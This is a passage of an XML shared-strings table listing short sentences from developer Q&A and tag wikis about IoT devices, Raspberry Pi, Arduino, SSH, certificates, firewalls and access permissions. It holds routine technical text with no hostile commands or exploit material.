    <t>The encrypted connection is over TLS: Watson IoT Platform presents a certificate to allow your TLS-enabled device to validate the certificate and hence trust it's talking to Watson IoT Platform.</t>
  </si>
  <si>
    <t>Root access will give the user the ability to install software outside approved methods.</t>
  </si>
  <si>
    <t>This would either require the Arduino to access to the main login server which can decide whether a cookie is valid or not, or would require the cookie to be constructed with an additional cryptographic data (this path leads too far... not a task for an Arduino.)</t>
  </si>
  <si>
    <t>You have to set an OnKeyListener, if this detects a keystroke, and that is "enter" I use the temp as Y coordinate and then clear the editText.</t>
  </si>
  <si>
    <t>The tablet internet connection must be over ethernet/usb, no wifi/bluetooth can be used due to regulations.</t>
  </si>
  <si>
    <t>There are numerous ways to use a read-only filesystem and protect the SD-card from corruption.</t>
  </si>
  <si>
    <t>Enabling remote root access to the MySQL database.</t>
  </si>
  <si>
    <t>Is there an easier solution for logging in into my remote gitlab repo?</t>
  </si>
  <si>
    <t>If you don't have root, you will not be able to execute direct key presses on your device with a shell command.</t>
  </si>
  <si>
    <t>When a user makes a request to a URL that's protected by a firewall, the security system is activated.</t>
  </si>
  <si>
    <t>Some extra-sensitive permissions, as noted below, can take up to 14 business days.</t>
  </si>
  <si>
    <t>Unlike the su command, users typically supply their own password to sudo rather than the root password.</t>
  </si>
  <si>
    <t>I want to create a centralized payment system that knows about each individual machine.</t>
  </si>
  <si>
    <t>I am looking for a solution in java for recording inputs for LIRC codes of any remote.</t>
  </si>
  <si>
    <t>Do you have any idea on an alternative device/technology to detect the objects?</t>
  </si>
  <si>
    <t>I have a node-red flow in my raspberry pi 3 for which I'd like to set a user and password in root mode, but haven't succeeded yet.</t>
  </si>
  <si>
    <t>I wound up adding this
#include "usb_private.h"
to hardware/teensy/avr/cores/usb_hid/usb_hid.h
And that did the trick.</t>
  </si>
  <si>
    <t>I created as script to suspend or shutdown a remote host over ssh.</t>
  </si>
  <si>
    <t>Using a smartcard to decrypt or sign a piece of data is usually protected by a PIN or passcode.</t>
  </si>
  <si>
    <t>You do not provide details about how you configured https with Tomcat (what would have been useful to give you a more precise answer).</t>
  </si>
  <si>
    <t>An OAuth Scope is a permission setting that limits the permissiveness of a given OAuth Token.</t>
  </si>
  <si>
    <t>Could there be a firewall issue here, I get an error saying:
I have tried both the URLlib and request libraries, both give me this error.</t>
  </si>
  <si>
    <t>About
CASL (pronounced /ksl/, like castle) is an isomorphic authorization JavaScript library (created by Sergii Stotskyi) which restricts what resources a given user is allowed to access.</t>
  </si>
  <si>
    <t>I can't launch the app via SSH because it requires X (due to PyQT4), so to get it running on the RPi, it has to be launched using the desktop icon on the device itself.</t>
  </si>
  <si>
    <t>Not sure if I'm passing the right flags to the assembler (pretty much all of them are undocumented?)</t>
  </si>
  <si>
    <t>I deactivated everything in the interfaces - raspi-config in the hope it uses a pin.</t>
  </si>
  <si>
    <t>The way I power off a linux box when I am logged into it remotely is to simply use the 'poweroff' command.</t>
  </si>
  <si>
    <t>Open a Private Window in your browser and do it there.</t>
  </si>
  <si>
    <t>It must also be connected and have the edge analytic agent installed.</t>
  </si>
  <si>
    <t>Apparently, IoTHub performs a very thorough validation of the certificate chain.</t>
  </si>
  <si>
    <t>However this may scrape unwanted data such as other images, icons, etc.</t>
  </si>
  <si>
    <t>You can't (possibly shouldn't) try to keep people from getting inside devices they own and are in their physical possession.</t>
  </si>
  <si>
    <t>The .netrc file contains data for logging in to a remote host over the network for file transfers by `ftp`</t>
  </si>
  <si>
    <t>A key is a set of attributes that is irreducibly unique and non-nullable within a table.</t>
  </si>
  <si>
    <t>The keytool utility is used to create and administer keystores.</t>
  </si>
  <si>
    <t>Other R objects may be coerced as appropriate, or S4 methods may be used: see sections Details and Value.</t>
  </si>
  <si>
    <t>A hash map (or hash table) is a data structure which contains "key-value" pairs and allows retrieving values by key.</t>
  </si>
  <si>
    <t>ECB mode encryption does not use an IV; if the framework requests one anyway please provide it blocksize bytes set to zero.</t>
  </si>
  <si>
    <t>Does anyone know of a scheme whereby MODBUS addresses can be automatically set?</t>
  </si>
  <si>
    <t>The issue now
  I am having is I'm getting  "SerialException: could not open port
  COM5: [Error 5] Access is denied."</t>
  </si>
  <si>
    <t>This means a WiFi-based is not desirable, because we'll need to set up Wi-Fi credentials for the Arduino beforehand.</t>
  </si>
  <si>
    <t>Also, if I can safely ignore the warnings, is there any way to suppress them?</t>
  </si>
  <si>
    <t>I'm the administrator so I don't think the problem is that I don't have administrative privileges.</t>
  </si>
  <si>
    <t>Additional information:
I'm connecting to Raspberry Pi through SSH (using PUTTY on Windows 7).</t>
  </si>
  <si>
    <t>My guess is that there is a firewall blocking the Pi from connecting, but is there a better explanation?</t>
  </si>
  <si>
    <t>I am working with another person and the arduino will be behind a firewall so I am not sure how to access it via the internet.</t>
  </si>
  <si>
    <t>As can be seen, there is no way here to resolve my TCP connections across a firewall proxy.</t>
  </si>
  <si>
    <t>Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".</t>
  </si>
  <si>
    <t>I am trying to use ruby version 1.9.3. 
rvm list known
# MRI Rubies 
[ruby-]1.8.6[-p420] 
[ruby-]1.8.7[-head] # security released on head 
[ruby-]1.9.1[-p431] 
[ruby-]1.9.2[-p330] 
[ruby-]1.9.3[-p551] 
[ruby-]2.0.0[-p598] 
[ruby-]2.1.4 
[ruby-]2.1[.5] 
[ruby-]2.2.0 
[ruby-]2.2-head 
ruby-head 
rvm use ruby-1.9.3-p551
ruby-1.9.3-p551 is not installed.</t>
  </si>
  <si>
    <t>It means that
  the lock that it required was held at that time, by another thread.</t>
  </si>
  <si>
    <t>To be extra sure I've used service apache2 stop and then service apache2 start to guarantee the webserver is running.</t>
  </si>
  <si>
    <t>I am simply connecting pc and pi2 through a switch, firewall of my PC is disabled.</t>
  </si>
  <si>
    <t>It means that the lock that it required was held at that time, by another thread.</t>
  </si>
  <si>
    <t>(0x80073cf6)
As soon as I remove the uap:Extension element, the error goes away (but the access denied is still there).</t>
  </si>
  <si>
    <t>Say your are developing the "forgot password" functionality on an app, running on a micro computer - like the raspberrypi - that the user can buy of the shelf?</t>
  </si>
  <si>
    <t>First I wrote a simple script in  like this:
Then I did the sudo chmod 755 /home/myfile.sh to grant the permissions.</t>
  </si>
  <si>
    <t>The i2C traffic is actually getting corrupted (as viewed on my logic analyzer) which surprised me a bit.</t>
  </si>
  <si>
    <t>or create a connection for access on that SD in remote ssh.</t>
  </si>
  <si>
    <t>However, for my project, I need to login first into the webserver (username + password) and then retrieve the info from the pages, but I don't know how to do it using the WebView class.</t>
  </si>
  <si>
    <t>The service requires mutual authentication with certificates, so I have a CA cert, service cert, and client cert.</t>
  </si>
  <si>
    <t>I have a couple of 12 bit ADCs which I want to expose to userspace.</t>
  </si>
  <si>
    <t>If test_ca_cert is a NULL pointer, the SSL connection is fine.</t>
  </si>
  <si>
    <t>My objective is no one be able to steal my code or make modifications to the code.</t>
  </si>
  <si>
    <t>All in the background without interfering with any terminal or SSH session.</t>
  </si>
  <si>
    <t>Set Programmatic access as Access Type and attached AWSIoTFullAccess permission.</t>
  </si>
  <si>
    <t>Anyhow - the firewall blocks the UDP packages.</t>
  </si>
  <si>
    <t>Is it possible to access device twin meta data in stream jobs.</t>
  </si>
  <si>
    <t>OKAY [  0.016s]
writing 'bootloader'...
FAILED (remote:  device is locked.)</t>
  </si>
  <si>
    <t>As a root user of my SQL database, I checked that I have full grant privileges.</t>
  </si>
  <si>
    <t>Update 2 I have found a way to circumvent the issue.</t>
  </si>
  <si>
    <t>As the title says, whats the correct way to configure an IoTEdge Module to report data to Remote Monitoring?</t>
  </si>
  <si>
    <t>The current motive is to be able to ssh into the device from another network and host a Git server on it.</t>
  </si>
  <si>
    <t>It seems that this "probing" does something on the network which is not initially done by the mDNS server but is required by HomeKit to be discoverable.</t>
  </si>
  <si>
    <t>The following messages are fine with a valid msg Id.</t>
  </si>
  <si>
    <t>In the next scenario:
code is not running
a message been sent to the device.</t>
  </si>
  <si>
    <t>I want to send traffic from my devices to AWS IOT but the M2M provider doesn't allow internet access from its sim cards, it only provide an IPSec connexion to a a private network.</t>
  </si>
  <si>
    <t>I got the secure server running but have hit a bit of a wall.</t>
  </si>
  <si>
    <t>As per this article the fault could be that of libssl1.0-dev not being there.</t>
  </si>
  <si>
    <t>I see these 'pink' alerts.. saying phpmyadmin@local host has no permissions/denied..etc..</t>
  </si>
  <si>
    <t>Is there any other secure and safe alternative for these functionalities ?</t>
  </si>
  <si>
    <t>In order to connect securely to an SSL enpoint I need to provide a signed certificate.</t>
  </si>
  <si>
    <t>Can someone share what would actually happen with an expired certificate configured in our devices?</t>
  </si>
  <si>
    <t>I also configured the common primary key and uploaded the code to board.</t>
  </si>
  <si>
    <t>The client I am having an issue with though is a local PC without a firewall in between.</t>
  </si>
  <si>
    <t>Still want to keep the interface wlan0 for ssh and vnc connection in my local network.</t>
  </si>
  <si>
    <t>After connecting to the wifi, I have to go to a login webpage to submit my username and password in order to get the full access to the Internet.</t>
  </si>
  <si>
    <t>I therefore feel unsafe using pointers and recursion (maybe I wouldn't if I knew more about it, but in fact I don't).</t>
  </si>
  <si>
    <t>I have already done a test in which I use Firebase Database Realtime which works well but without configuring the security.</t>
  </si>
  <si>
    <t>I am setting up a captive portal similar based on this.</t>
  </si>
  <si>
    <t>I do have granted all the privileges and commented the blind-address
OS : ubuntu 18.04
Thanku for help</t>
  </si>
  <si>
    <t>I am setting up authentication in an esp8266WiFiServer and I managed to add authentication process.</t>
  </si>
  <si>
    <t>Certificates are bought for domain names and not for a local IP address.</t>
  </si>
  <si>
    <t>Vagrant up and vagrant rdp work perfectly, but when I try to vagrant ssh, vagrant asks for password tree times and fails with:
vagrant@127.0.0.1: Permission denied (publickey,password,keyboard-interactive).</t>
  </si>
  <si>
    <t>I can install spyder using , which points to an old version with python 2.7.</t>
  </si>
  <si>
    <t>But: I never used any kind of authorization not in the first part which works perfectly neither in the second.</t>
  </si>
  <si>
    <t>Any idea about the format of deviceCertificate-PrivateKey before securely connecting to endpoint..?</t>
  </si>
  <si>
    <t>i found on StackOverflow how to connect it: Raspberry pi3 Mysql Python ERROR
But i can not set a password on my pi
How i will connect to the database
So i wanted to be able to connect to the database with my Code</t>
  </si>
  <si>
    <t>I'm using WifiManager library to manually add user's network on configuration portal.</t>
  </si>
  <si>
    <t>Is there a Windows application that can spy on this connection and display the traffic going in both directions?</t>
  </si>
  <si>
    <t>Raw bytes are fine, I don't need the protocol decoded.</t>
  </si>
  <si>
    <t>The password will still be accessible to anyone with physical access to the device, but not people who only have access to  and .hex files.</t>
  </si>
  <si>
    <t>This can all be compromised a bit by windows, though, as it tends to buffer data (i.e.</t>
  </si>
  <si>
    <t>You would need to set meas[type] to a known invalid value before the read (such as 0).</t>
  </si>
  <si>
    <t>To set the current encryption key, just enter the key in hex digits as XXXX-XXXX-XXXX-XXXX or XXXXXXXX.</t>
  </si>
  <si>
    <t>I am a bit at a loss how you are sending data via PWM exactly: it seems like it would be an unwarrated hack.</t>
  </si>
  <si>
    <t>The values of your data not in danger of violating the limits would never have to be touched by the filter.</t>
  </si>
  <si>
    <t>If that works then it's likely that a firewall is blocking your port or you've got a bug in your Adruino code
However, if that doesn't work, then you need to look closely at your server code.</t>
  </si>
  <si>
    <t>To copy a string, use  strcpy function (or its secure sister strncpy):
void testfunc(char* outStr){
     strcpy(ouStr, "Hi there.</t>
  </si>
  <si>
    <t>When referring to the remote git repo via https, git will ALWAYS ask for password.</t>
  </si>
  <si>
    <t>I guess you're talking about Intel's Low Pin Count protocol.</t>
  </si>
  <si>
    <t>It's important to use proper case for identifiers in python.</t>
  </si>
  <si>
    <t>1: The broker/client will deliver the message at least once, with confirmation required.</t>
  </si>
  <si>
    <t>It's possible that File and Registry Redirection is causing an issue, but i doubt it.</t>
  </si>
  <si>
    <t>For example, using the latter:
bt-device -d
bt-device -c &lt;MAC&gt;
bt-device --set &lt;MAC&gt; Trusted 1
bt-audio -c &lt;MAC&gt;
The first command discovers the device, the seconds connects to it by its MAC address.</t>
  </si>
  <si>
    <t>The direct access x accesses the identifier internally linked in my.c.</t>
  </si>
  <si>
    <t>on logfiles) and authorization information (in your case sudoers) must be set 
accordingly.</t>
  </si>
  <si>
    <t>When connecting with Quickstart to Internet of Things Foundation there is no authentication required.</t>
  </si>
  <si>
    <t>Be cognizant that such techniques are not secure and could interfere with other device drivers.</t>
  </si>
  <si>
    <t>https://myraspberryandme.wordpress.com/2013/11/20/bluetooth-serial-communication-with-hc-05/
Basically, you need to provide the password (1234) of the HC-05 module before connecting.</t>
  </si>
  <si>
    <t>I would suggest to expose your MongoDB data through a web service.</t>
  </si>
  <si>
    <t>The message  (permission denied) is telling you, that your group lacks the x permission.</t>
  </si>
  <si>
    <t>Therefore, you will not need to disable them, preventing for losing data in the case of UART RX interrupt.</t>
  </si>
  <si>
    <t>If it's greater than 10 when you expect it to be, then you can rule that out as the suspect.</t>
  </si>
  <si>
    <t>Alternatively, and this is probably easier, you could do 
(where /usr/bin/blinkscript is your python program with the #!/usr/bin/python and permissions set so username cannot overwrite the file etc.)</t>
  </si>
  <si>
    <t>Restrictions on certain character codes are fairly common.</t>
  </si>
  <si>
    <t>You should check the firewall rules in your client PC</t>
  </si>
  <si>
    <t>Login as root and type:
And that will allow you to set a new password for user pi.</t>
  </si>
  <si>
    <t>Sorry if my answer is a bit vague but from what I understand is that the scripts require to be run via admin privileges.</t>
  </si>
  <si>
    <t>The subscriber ID, with other useful information, is displayed and you can copy it the to the xml file on your raspberry.</t>
  </si>
  <si>
    <t>Take a look at this answer for citation and more details about the capabilities of the exposed UART.</t>
  </si>
  <si>
    <t>According to this page, it does not appear that my router supports SSH.</t>
  </si>
  <si>
    <t>Optionally set a pin (it defaults to 0000).</t>
  </si>
  <si>
    <t>If that is the case in your network, then there will be an IP conflict and your device will not have Internet connectivity.</t>
  </si>
  <si>
    <t>But it is a special character in shell, and you should escape or quote the string to avoid the shell to transform the password string.</t>
  </si>
  <si>
    <t>This post details how to do it on *nix based systems, and some comments on how to hack it together on windows.</t>
  </si>
  <si>
    <t>Applications can share the same API key, but MQTT requires that the client ID is always unique.</t>
  </si>
  <si>
    <t>Try generating a SAS Token using the same Device Explorer tool, but on the "Configuration" tab for this.</t>
  </si>
  <si>
    <t>I guess you did not request or did not approve the Bluetooth and Location permissions for your application.</t>
  </si>
  <si>
    <t>Even one setting being off will completely stop RS-232 communications.</t>
  </si>
  <si>
    <t>I purchased  which is suitable for hacking tools in raspberry pi.</t>
  </si>
  <si>
    <t>The default ports for RADIUS are 1812/UDP (authentication) and 1813/UDP (accounting).</t>
  </si>
  <si>
    <t>A solution is to launch the shutdown in the background, with some delay to allow the user to safely exit the ssh connection.</t>
  </si>
  <si>
    <t>Nerves supports encrypted filesystems through the Linux kernel (corrected).</t>
  </si>
  <si>
    <t>You can use ssh and a shared key's to execute remote commands on servers.</t>
  </si>
  <si>
    <t>Yours is probably set to /var/www/ so attempting to access anything outside that is not going to work, regardless of permissions.</t>
  </si>
  <si>
    <t>Client ID is: 
If any of the configurations is incorrect, you will be unable to connect.</t>
  </si>
  <si>
    <t>Permissions added to your app will be granted after reboot.</t>
  </si>
  <si>
    <t>Take a look at the SensorHub sample app on GitHub, which is similar to the weather station, but uses Cloud IoT Core to authenticate and publish instead.</t>
  </si>
  <si>
    <t>There is an example of using a Google Cloud Function to publish a configuration change to a device.</t>
  </si>
  <si>
    <t>The script in question sets up Mosquitto to require a username and password when connecting via the native MQTT listener (but not the websocket listener strangely).</t>
  </si>
  <si>
    <t>You can do that by: Security &gt; Connection Security &gt; Secutity Level set on TLS Optional</t>
  </si>
  <si>
    <t>If the GATT services on your peripheral device require authentication, then you 
may need to know the authentication pin depending on the IO capabilities of the device.</t>
  </si>
  <si>
    <t>This way systemd will do the heavy lifting of monitoring/restarting/etc your services and you will use ssh just to control the master service.</t>
  </si>
  <si>
    <t>And most important here is in the google console when you create a new auth credential you must choose Ios as below.</t>
  </si>
  <si>
    <t>Some companies have firewalls that will prevent WebSockets from
working.</t>
  </si>
  <si>
    <t>In the mobile hub, you can configure all settings for logins.</t>
  </si>
  <si>
    <t>See section 3.2 of this below PDF, referencing SSL handshake failure for ESP8266.</t>
  </si>
  <si>
    <t>The code you've written is trying to act as a proxy, not a router.</t>
  </si>
  <si>
    <t>HTTP requires the addition of proxy headers.</t>
  </si>
  <si>
    <t>You do not need to develop a specific utility to decode data.</t>
  </si>
  <si>
    <t>You can add proxy setting explicitly to the application.</t>
  </si>
  <si>
    <t>The pairing request is what triggers your devices to be discovered.</t>
  </si>
  <si>
    <t>If you have a store-signed app you will have to install the license file.</t>
  </si>
  <si>
    <t>The first I assuming is some type of identification flag.</t>
  </si>
  <si>
    <t>Here are the steps..
Buy a Raspberey pi3 board..
Also buy raspberry pi compatible Fingerprint module..
Then install Raspberry os on raspberry pi board...</t>
  </si>
  <si>
    <t>sudo reboot 
or 
sudo poweroff
Both of these commands will let the wifi configured correctly.</t>
  </si>
  <si>
    <t>After looking for an answer I came up with the solution of disabling the firewall and it worked.</t>
  </si>
  <si>
    <t>I do need the registry certificate to ensure fraudulent devices are not registered.</t>
  </si>
  <si>
    <t>.htpasswd :
User:$sjjnuinusencryptedpasswordijkmi22993
.htaccess :
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /var/www/html/limited/.htpasswd
Hope this helps someone.</t>
  </si>
  <si>
    <t>(i still see 3 potential issues with this, 1: forward secrecy is not provided, for that you'd need something much more complex, i think.</t>
  </si>
  <si>
    <t>But as soon as you leave your PI, the shell program is closed and the alias setting is thrown away.</t>
  </si>
  <si>
    <t>And then launch a process to call ffmpeg to covert the audio file to mp3.</t>
  </si>
  <si>
    <t>The VMs in GCE (Google Compute Engine) have a locked down firewall by default.</t>
  </si>
  <si>
    <t>Re-encoding would cause a decrease of the audio quality.</t>
  </si>
  <si>
    <t>Access Point is a configurable network identifier used by a mobile device when connecting to a GSM carrier.</t>
  </si>
  <si>
    <t>File locks are locks held by an application, preventing interference from other processes.</t>
  </si>
  <si>
    <t>setfsuid() is a function that is used to set user identity used for file system checks on UNIX -like systems.</t>
  </si>
  <si>
    <t>A user account is a data object that represents a physical user of a computer system.</t>
  </si>
  <si>
    <t>This is refered to the permissions over the personal info that the facebook users can grant over an application.</t>
  </si>
  <si>
    <t>Bindgen is a type-safe alternative to expression languages like UL and OGNL.</t>
  </si>
  <si>
    <t>SimpleCaptcha is a Java library for generating CAPTCHA images and audio for the challenge/answer pairs.</t>
  </si>
  <si>
    <t>Consistent Hashing, a process discovered by Karger et al.</t>
  </si>
  <si>
    <t>AWS-VPC is the Virtual Private Cloud from the AWS.</t>
  </si>
  <si>
    <t>Data is cryptographically signed to ensure that a token has not been tampered with.</t>
  </si>
  <si>
    <t>TypoScript mainly defines configuration values that are passed to the systems php code.</t>
  </si>
  <si>
    <t>Use ssh instead if your question is not specifically about the daemon, but (also) about the client or the protocol.</t>
  </si>
  <si>
    <t>First, some classified samples are supplied to the algorithm.</t>
  </si>
  <si>
    <t>Identifiers are arbitrary strings but must be unique within the HTML document.</t>
  </si>
  <si>
    <t>Once inside the jail, a process is not permitted to escape outside of this subtree.</t>
  </si>
  <si>
    <t>Shuffling is the process by which the order of the elements in a collection is randomized.</t>
  </si>
  <si>
    <t>Microsoft now recommends users to switch to PowerShell
https://docs.microsoft.com/en-us/powershell/module/pkiclient/new-selfsignedcertificate?view=win10-ps</t>
  </si>
  <si>
    <t>The public key is stored on the target machine in the $HOME/.ssh/authorized_keys file.</t>
  </si>
  <si>
    <t>Note:
The .netrc file is not used by any programs when the securetcpip command is running on your system.</t>
  </si>
  <si>
    <t>Security precautions should be taken to ensure that only your own pages will run in the webview, or that all Java code that can be called will not cause a security breach.</t>
  </si>
  <si>
    <t>The passband modulation and corresponding demodulation (also known as detection) is carried out by modem equipment.</t>
  </si>
  <si>
    <t>cleardb is a reliable, fault tolerant database-as-a-service for your MySQL powered applications.</t>
  </si>
  <si>
    <t>Fault Tolerance
HyperDex ensures that data is replicated to withstand a user-configurable threshold of failures.</t>
  </si>
  <si>
    <t>The replication protocol ensures that no operation is acknowledged until it has been processed by every replica.</t>
  </si>
  <si>
    <t>It uses brute force to scan an address range for active bluetooth devices.</t>
  </si>
  <si>
    <t>Starting in iOS7, each application installed on the same device gets a unique device token.</t>
  </si>
  <si>
    <t>All of this without having dedicated network hardware such as routers and switches.</t>
  </si>
  <si>
    <t>A Work Account will be how your users know that they are accessing their important documents and data backed my Microsoft security.</t>
  </si>
  <si>
    <t>The Security Support Provider Interface (sspi) is a Microsoft Windows API used to perform security-related operations such as authentication.</t>
  </si>
  <si>
    <t>SSID acts as a password when a mobile device tries to connect to the basic service set (BSS).</t>
  </si>
  <si>
    <t>WSDualHttpBinding only supports SOAP security and requires reliable messaging.</t>
  </si>
  <si>
    <t>The client should use security to ensure that it only connects to services it trusts.</t>
  </si>
  <si>
    <t>Operation of PGM/IP will require special privileges on Unix and Microsoft Windows Vista and above.</t>
  </si>
  <si>
    <t>About
 is a tool for non-interactively performing password authentication with SSH's so called "interactive keyboard password authentication".</t>
  </si>
  <si>
    <t>when validations fail, even on S3
Effortless direct uploads, even to S3
Homepage</t>
  </si>
  <si>
    <t>You can define many virtual hosts, each with its own SSL certificate.</t>
  </si>
  <si>
    <t>Registering your package allows others to install it with a short name, like .</t>
  </si>
  <si>
    <t>Every Android app runs in a limited-access sandbox.</t>
  </si>
  <si>
    <t>SSZipArchive
ZipArchive is a simple utility class for zipping and unzipping files on iOS and Mac.</t>
  </si>
  <si>
    <t>This configuration is provided in the form of
  key and trust managers.</t>
  </si>
  <si>
    <t>WebSockets supports both unencrypted and encrypted connections.</t>
  </si>
  <si>
    <t>A cryptosystem (combination of an algorithm and its key) is then split into the algorithm, which is embodied as an implementation, and a key, for which security can be quantified (e.g.</t>
  </si>
  <si>
    <t>Rserve supports remote connection, authentication and file transfer also.</t>
  </si>
  <si>
    <t>PIAs are important because they provide unique type identity.</t>
  </si>
  <si>
    <t>Greasemonkey also permits special operations that ordinary javascript is not allowed to do.</t>
  </si>
  <si>
    <t>The third type of authentication relies on documentation or other external affirmations.</t>
  </si>
  <si>
    <t>Holochain is a framework for building peer-to-peer, cryptographically secure applications that non-technical users can enjoy.</t>
  </si>
  <si>
    <t>Networking is set up automatically, the VM gets the same IP as any docker container on the host would.</t>
  </si>
  <si>
    <t>TypoScript mainly defines configuration values that are passed to the systems PHP code.</t>
  </si>
  <si>
    <t>When using key-object coding, the key is copied using copyWithZone: and it must conform to the NSCopying protocol.</t>
  </si>
  <si>
    <t>In other software, the GSS-API (RFC 4121) interface is commonly used to perform Kerberos authentication.</t>
  </si>
  <si>
    <t>An optional universal number for all of your phones.</t>
  </si>
  <si>
    <t>Rserve supports remote connection, authentication and file transfer.</t>
  </si>
  <si>
    <t>Facebook permissions are the different permissions that a web application can ask from a Facebook user, to access user data, user's friends' data, and also to take actions on behalf of the user.</t>
  </si>
  <si>
    <t>Do all DDL during a maintenance window with all end-users locked-out.</t>
  </si>
  <si>
    <t>It gets detected in Device Manager (I have updated the driver as well).</t>
  </si>
  <si>
    <t>How can I force a mac address off the access point instantly without restarting hostapd?</t>
  </si>
  <si>
    <t>I have tried moving the file to where Mopidy gets it's Javascript files from and to various other places, and the file has a full set of permissions.</t>
  </si>
  <si>
    <t>I have an SSH connection open in the terminal on my MacBook Pro running OS X Mavericks.</t>
  </si>
  <si>
    <t>PS: I prefer a description for bash because I use SSH</t>
  </si>
  <si>
    <t>I'm running rpcapd on a Raspberry which serves as a WiFi access point to trace/sniff network traffic by WiFi users.</t>
  </si>
  <si>
    <t>They dont have public API exposed and i dont know how they are sending the data.</t>
  </si>
  <si>
    <t>I'm using PuTTY
from a windows computer to connect to the raspberry.</t>
  </si>
  <si>
    <t>Just bought an arduino uno &amp; stuck already
Many thanks
robot_arm1:3: error: expected unqualified-id before '/' token</t>
  </si>
  <si>
    <t>Is there a C# example somewhere I can follow other than the node.js - what does this line mean "hmac.update(toSign);"
Is there any simpler way to authenticate a device to the server?</t>
  </si>
  <si>
    <t>May be the ISP is down and my router still gives the ESP8266 a valid IP.</t>
  </si>
  <si>
    <t>Using same credentials work when running the script on local machine and using ngrok to assign to Alexa skill endpoint.</t>
  </si>
  <si>
    <t>The bit that I don't understand is why I need to SSH in order for this to work and how can I change it so that I don't have to?</t>
  </si>
  <si>
    <t>I want to build a video security infrastructure with raspberry pis.</t>
  </si>
  <si>
    <t>The RPI is connected via SSH and the wifi network is one created from my own router on which both the PC and the raspberry are the only ones connected.</t>
  </si>
  <si>
    <t>We don't want to have to keep up with customer firewall port forwarding.</t>
  </si>
  <si>
    <t>Everything works fine, messages can be exchanged, however the certificate can not be verified by the WifiSecureClient.</t>
  </si>
  <si>
    <t>Is it possible to modify the firmware to send error messages to a remote server for logging?</t>
  </si>
  <si>
    <t>192.168.1.31:/  /home/pi/windowsshare  nfs  credentials=/home/pi/.smbcredentials,iocharset=ANSI  0  0
I changed utf8 to ANSI, because the NFS server is configured to use ANSI.</t>
  </si>
  <si>
    <t>Currently using systemd to set up my network so I can ssh into my pi and use it as a access point.</t>
  </si>
  <si>
    <t>I thought that the easiest thing, might just be to shutdown the pi from the other pi.</t>
  </si>
  <si>
    <t>One step I did ensure: The app in Xcode has the Network Extension capabilities enabled.</t>
  </si>
  <si>
    <t>When I login to the server (using my real username), and I try to run a script that connects to AWS, it connects just fine.</t>
  </si>
  <si>
    <t>This works perfectly well when submitting correct WiFi credentials.</t>
  </si>
  <si>
    <t>Or can anyone help me figure out what's wrong with my current coding for aliases?</t>
  </si>
  <si>
    <t>I am using Adafruit libraries for fingerprint and thermal printer.</t>
  </si>
  <si>
    <t>Now, I'm still able to run the assistant service via the googlesamples-assistant-hotword --device-model-id 'model-identifier' command as I have installed all the required files for that beforehand.</t>
  </si>
  <si>
    <t>Previously I worked with FZ2904 fingerprint module and it worked fine.</t>
  </si>
  <si>
    <t>Here, do we need public IP address of the Linux machine where 
   proxy is running?</t>
  </si>
  <si>
    <t>Failed to load apps Permission denied.</t>
  </si>
  <si>
    <t>So at this point I have the working CA-cert installed in my OS and I have it linked via tha python-SDK too.</t>
  </si>
  <si>
    <t>Also is there any REST API exposed by azure DPS to register device?</t>
  </si>
  <si>
    <t>I have a question about python and MySQL:
I want to create a MySQL server on my raspberrypi3 but i realized i need to set a password on my raspberry pi.</t>
  </si>
  <si>
    <t>I would try re-installing the arduino IDE as it could have gotten corrupted or outdated.</t>
  </si>
  <si>
    <t>I am guessing it may be part of some instruction set detection code.</t>
  </si>
  <si>
    <t>Changing the bootloader without JTAG is usually suicide, except (today) you can reprogram your SD card off the board safely.</t>
  </si>
  <si>
    <t>The first thing to do is validate the the XBEE radios are sending traffic.</t>
  </si>
  <si>
    <t>Granting sudo privileges should be the absolute last thing you try.</t>
  </si>
  <si>
    <t>.zshrc on my OSX laptop contains:
after I ssh into raspbian, tput colors returns 256.</t>
  </si>
  <si>
    <t>Also, scan_ssid must be set to 1 to be able to detect a hidden SSID.</t>
  </si>
  <si>
    <t>Update
The current syntax for wifi.sta.config is as follows:
station_cfg={}
station_cfg.ssid=SSID
station_cfg.pwd=PASSWORD
wifi.sta.config(station_cfg)</t>
  </si>
  <si>
    <t>This can also be verified by checking out the source code on GitHub.</t>
  </si>
  <si>
    <t>This is the path you will need to take if you cannot load/update the token to the GPS device.</t>
  </si>
  <si>
    <t>Right now you set up an array called password2 with some length (you didn't show all the code so who knows).</t>
  </si>
  <si>
    <t>IF not entered, device id will be set to
  registration id itself, as per documentation.</t>
  </si>
  <si>
    <t>ARM Trusted Firmware and u-boot are compiling fine with aarch64-elf for example.</t>
  </si>
  <si>
    <t>ssid is the hidden SSID of your router or access point.</t>
  </si>
  <si>
    <t>Flask handlers interrogate/set via the shared state holder.</t>
  </si>
  <si>
    <t>So, I would also want to ensure it is all accessible only via https (secure,encrypted).</t>
  </si>
  <si>
    <t>I ended up creating the credential file on a different machine.</t>
  </si>
  <si>
    <t>In addition, here is a tutorial to implement a device firmware update process.</t>
  </si>
  <si>
    <t>The process when implemented, would look something like this:
actiate ssh server on pi if not yet done,
obtain ssh client for game client machine.</t>
  </si>
  <si>
    <t>After registering a device on IoTHub you will need to retrieve it's connection string to use on this example.</t>
  </si>
  <si>
    <t>There are remotes that send a different "code" every other time a certain key is pressed.</t>
  </si>
  <si>
    <t>The other option, having database exposed as a webservice would be a lot easier.</t>
  </si>
  <si>
    <t>Since OAuth-1.0 is deprecated in favor of OAuth-2.0 - use it only for legacy projects (until it's not updated to support OAuth-2.0).</t>
  </si>
  <si>
    <t>mitmproxy is an interactive console tool that allows network traffic to be inspected and edited on the fly.</t>
  </si>
  <si>
    <t>It was developed as an alternative to users handing out their login credentials to third-party applications.</t>
  </si>
  <si>
    <t>Prior to release, this had previously been referred to as the  "Intelligent Security Graph".</t>
  </si>
  <si>
    <t>CASL (pronounced /ksl/, like castle) is an isomorphic authorization JavaScript library which restricts what resources a given user is allowed to access.</t>
  </si>
  <si>
    <t>Unvalidated input is not available in Agavi's actions or views for consumption.</t>
  </si>
  <si>
    <t>However, this class exposes a public API.</t>
  </si>
  <si>
    <t>MMX is a trademark used to reference an extension to the Intel Architecture Instruction set.</t>
  </si>
  <si>
    <t>Zero ( - SW_HIDE) results in window being completely hidden.</t>
  </si>
  <si>
    <t>This module allows the use of an HTML login form to restrict access by looking up users in the given providers.</t>
  </si>
  <si>
    <t>The chrome.webRequest API can be used to observe and analyze traffic and to intercept, block, or modify requests in-flight.</t>
  </si>
  <si>
    <t>I wrote Blowfish as such an alternative, but I didn't even know if it would survive a year of cryptanalysis.</t>
  </si>
  <si>
